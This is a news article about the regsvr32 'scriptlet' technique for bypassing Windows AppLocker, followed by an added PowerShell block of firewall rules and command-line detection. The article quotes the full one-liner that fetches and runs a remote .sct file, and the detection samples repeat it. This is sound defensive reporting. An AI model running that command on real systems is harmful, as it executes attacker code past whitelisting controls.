SafeUM
Axarhöfði 14, 110 Reykjavik, Iceland

Iceland - 2015
26 Apr 2016

Researcher uses Regsvr32 function to bypass AppLocker

For years, business-focused versions of Windows have had an AppLocker feature that lets you blacklist or whitelist apps.

It's undoubtedly helpful for companies eager to keep malware (or just risky software) off their network. A researcher in Colorado has discovered a feature in Regsvr32 that allows an attacker to bypass application whitelisting protections, such as those afforded by Microsoft's AppLocker.

If the technique is used, there's little evidence left behind for investigators, as the process doesn't alter the system registry and in some cases comes across as normal Internet Explorer traffic. Casey Smith, a researcher in Colorado, needed to install a reverse shell, but the workstation in question was locked down by AppLocker and script rules. After some trial and error, he discovered an interesting solution:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

"The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. ... And ... You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control," Smith wrote.


Up until this week, few people – if any – knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all an attacker has to do is place the code block (VB or JS) inside the registration element of the scriptlet. Smith published several proof-of-concept scripts, which other researchers confirmed work as expected.

If used, this command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. It's certainly a neat trick. As Smith wrote, it doesn't alter the registry, it doesn't require administrative privileges, and the scripts can be called over HTTP or HTTPS. Salted Hash has reached out to Microsoft for comment, and we'll update this story if they choose to respond.

"Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective," wrote an information security consultant in Southern California who goes by the handle Munin. Regsvr32 is whitelisted, seen as an essential system function. The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs (external or local). "Kind of like early Web browsers, when JavaScript first came out," Munin explained to Salted Hash.

Munin said that a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the "Temporary Internet Files" folder. There is no patch available, but Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. It's possible that blocks on Regsvr32.exe and Regsvr64.exe will be needed for full effectiveness.

Other researchers have said that Device Guard, fully enabled with script protection, will block this bypass as well, but that would require that the organization have Windows 10 Enterprise and Hyper-V on the system in question. "This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible," Munin said.

Several readers have emailed (in addition to the comment below) to say that .sct files shouldn't be used as an indicator, as any file extension will work. This will make investigations all the more difficult until Microsoft does something about this function.
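As an added example (not part of the article, nor Smith's or Munin's material), here are the two defensive measures discussed above in PowerShell: the Windows Firewall block on regsvr32.exe that Munin suggests, and a command-line check that keys on the /i: URL switch and scrobj.dll rather than on the file extension, since readers point out that any extension works. It assumes the NetSecurity module (Windows 8 / Server 2012 and later) and an elevated session for the firewall rules, reads "Regsvr32.exe and Regsvr64.exe" as the System32 and SysWOW64 copies of regsvr32.exe, and uses constructed sample command lines.

```powershell
# Added example (not from the article): defender-side measures for the
# regsvr32 scriptlet bypass described above.

# 1. Block outbound network access for regsvr32.exe with Windows Firewall,
#    removing the "network awareness" the bypass relies on. Both the 64-bit
#    (System32) and 32-bit (SysWOW64) copies are covered (assumption: this is
#    what "Regsvr32.exe and Regsvr64.exe" refers to). Requires an elevated shell.
$regsvr32Paths = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\SysWOW64\regsvr32.exe"
)
foreach ($path in $regsvr32Paths) {
    $name = "Block outbound - $path"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound `
            -Program $path -Action Block -Profile Any -Enabled True | Out-Null
    }
}

# 2. Detection on process-creation command lines (for example Sysmon Event
#    ID 1, or Security 4688 with command-line auditing enabled). The file
#    extension is not a reliable indicator; a /i: argument carrying a URL, or
#    scrobj.dll as the registered object, is what marks the scriptlet use.
function Test-Regsvr32ScriptletCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    $isRegsvr32 = $CommandLine -match '(?i)(^|[\\\s"])regsvr32(\.exe)?\b'
    $hasUrl     = $CommandLine -match '(?i)/i:\s*"?(https?|ftp)://'
    $hasScrobj  = $CommandLine -match '(?i)\bscrobj\.dll\b'
    return ($isRegsvr32 -and ($hasUrl -or $hasScrobj))
}

# Constructed sample command lines for a dry run (not real log data).
$samples = @(
    'regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll',
    'C:\Windows\System32\regsvr32.exe /s /i:https://example.invalid/anything.txt scrobj.dll',
    'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'
)
foreach ($cmd in $samples) {
    $verdict = if (Test-Regsvr32ScriptletCommand $cmd) { 'ALERT' } else { 'ok' }
    "{0,-6} {1}" -f $verdict, $cmd
}
```

The firewall rule only stops the remote-URL variant; a scriptlet already on disk or reachable by a local path is not affected by it, which is why the command-line check is paired with it.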

Tags:
Windows AppLocker information leaks
Source:
CSO Online